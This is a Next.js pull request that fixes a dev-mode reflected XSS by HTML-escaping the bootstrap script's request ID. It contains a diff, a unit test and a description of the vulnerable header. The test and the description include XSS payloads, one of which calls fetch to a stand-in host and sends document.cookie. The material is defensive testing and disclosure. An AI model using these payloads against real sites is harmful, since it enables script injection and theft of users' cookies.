### PR TITLE
fix(app-render): HTML-escape bootstrapScriptContent to prevent dev-mode XSS

### DIFF
--- a/packages/next/src/server/app-render/app-render.tsx
+++ b/packages/next/src/server/app-render/app-render.tsx
@@ -264,6 +264,7 @@ import {
   anySegmentNeedsInstantValidationInBuild,
   resolveInstantConfigSamplesForPage,
 } from './instant-validation/instant-config'
+import { htmlEscapeJsonString } from '../../shared/lib/htmlescape'
 import { warnOnce } from '../../shared/lib/utils/warn-once'
 import {
   createWebDebugChannel,
@@ -3342,7 +3343,7 @@ async function renderToStream(
   // For MPA navigations (page reload, direct URL entry), the request ID
   // header is not present, so we generate a random one.
   const bootstrapScriptContent = process.env.__NEXT_DEV_SERVER
-    ? `self.__next_r=${JSON.stringify(requestId ?? crypto.randomUUID())}`
+    ? `self.__next_r=${htmlEscapeJsonString(JSON.stringify(requestId ?? crypto.randomUUID()))}`
     : undefined
 
   // Create the "render route (app)" span manually so we can keep it open during streaming.

--- a/packages/next/src/server/app-render/bootstrap-script-content.test.ts
+++ b/packages/next/src/server/app-render/bootstrap-script-content.test.ts
@@ -1,0 +1,35 @@
+import { htmlEscapeJsonString } from '../../shared/lib/htmlescape'
+
+describe('bootstrapScriptContent escaping', () => {
+  function buildBootstrapScriptContent(requestId: string): string {
+    return `self.__next_r=${htmlEscapeJsonString(JSON.stringify(requestId))}`
+  }
+
+  it('does not contain a raw </script> closing tag when the request ID is malicious', () => {
+    const maliciousId =
+      '0</script><script>fetch("https://evil.example/steal?c="+document.cookie)</script>'
+    const content = buildBootstrapScriptContent(maliciousId)
+    expect(content).not.toContain('</script>')
+  })
+
+  it('produces valid JSON that round-trips to the original request ID', () => {
+    const maliciousId = '0</script><img src=x onerror=alert(origin)>'
+    const content = buildBootstrapScriptContent(maliciousId)
+    // Extract the JSON value after `self.__next_r=`
+    const jsonPart = content.slice('self.__next_r='.length)
+    expect(JSON.parse(jsonPart)).toBe(maliciousId)
+  })
+
+  it('does not contain raw angle brackets', () => {
+    const id = 'normal-uuid-1234</script>injected'
+    const content = buildBootstrapScriptContent(id)
+    expect(content).not.toMatch(/<|>/)
+  })
+
+  it('leaves a well-formed UUID unchanged in meaning', () => {
+    const uuid = 'f47ac10b-58cc-4372-a567-0e02b2c3d479'
+    const content = buildBootstrapScriptContent(uuid)
+    const jsonPart = content.slice('self.__next_r='.length)
+    expect(JSON.parse(jsonPart)).toBe(uuid)
+  })
+})


### PR DESCRIPTION
## What?

Applies `htmlEscapeJsonString()` to the `bootstrapScriptContent` inline script generated in development server mode, closing a reflected XSS vector via the `x-nextjs-request-id` request header.

## Why?

The GHSA security patch (commit `647d923a3f`) fixed the same class of bug — `JSON.stringify()` without HTML escaping in an inline `<script>` — in two places:

- `packages/next/src/server/app-render/stream-ops.node.ts` ✅
- `packages/next/src/server/app-render/use-flight-response.tsx` ✅

The `bootstrapScriptContent` assignment in `app-render.tsx` was missed:

```typescript
// Before — vulnerable
const bootstrapScriptContent = process.env.__NEXT_DEV_SERVER
  ? `self.__next_r=${JSON.stringify(requestId ?? crypto.randomUUID())}`
  : undefined
```

`requestId` comes from the `x-nextjs-request-id` header (not in `INTERNAL_HEADERS`). Sending:

```
X-Nextjs-Request-Id: 0</script><img src=x onerror=alert(origin)>
```

produces a broken script tag in the HTML output, allowing arbitrary JS execution. Only the dev server is affected — production builds never reach this branch (`process.env.__NEXT_DEV_SERVER` is undefined).

Related issue: https://github.com/vercel/next.js/issues/93732

## How?

```diff
+ import { htmlEscapeJsonString } from '../../shared/lib/htmlescape'

  const bootstrapScriptContent = process.env.__NEXT_DEV_SERVER
-   ? `self.__next_r=${JSON.stringify(requestId ?? crypto.randomUUID())}`
+   ? `self.__next_r=${htmlEscapeJsonString(JSON.stringify(requestId ?? crypto.randomUUID()))}`
    : undefined
```

A unit test is added at `packages/next/src/server/app-render/bootstrap-script-content.test.ts` verifying that a malicious request ID containing `</script>` is safely escaped and round-trips correctly via `JSON.parse`.

<!-- NEXT_JS_LLM_PR -->